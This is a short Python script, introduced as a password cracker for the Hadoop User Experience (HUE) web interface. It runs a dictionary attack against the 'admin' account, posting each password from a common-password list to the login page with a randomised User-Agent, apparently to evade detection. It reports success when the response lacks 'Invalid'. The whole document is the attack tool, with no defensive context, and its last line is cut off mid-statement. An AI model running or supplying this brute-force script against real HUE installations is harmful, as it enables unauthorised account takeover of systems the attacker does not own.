Hadoop User Experience password cracking script. Written in Python.
346c8debb6514dbf4ca115ad94a87c52957b2b54af20bc5ca235907b448747a8
#!/usr/bin/python
import sys
import requests
import datetime
from fake_useragent import UserAgent
## CONFIG STARTS HERE ##
user = "admin"
host = "hostname:port"
listfile = "~/dictionaries/top1000-worst-passwords.txt"
## CONFIG ENDS HERE##
dictionary = open(listfile)
list = dictionary.readlines()
words = [ ]
print "Initializing dictionary",
for entry in list:
print('.'),
newword = entry.rstrip("\n")
words.append(newword)
print "Now testing "
for password in words:
ua = UserAgent().random
headers = { "User-Agent" : ua }
post = { "username" : user, "password" : password }
r = requests.post("http://" + host + "/accounts/login/?next=/", headers=headers, data=post)
invalid = r.text.find("Invalid")
if invalid == -1:
print "\nSuccess! " + user + ":" + password
print "Completed test at ",
print datetime.datetime.now()
sys.exit()
else:
print "...."
print "Attack unsuccessful...Completed at ",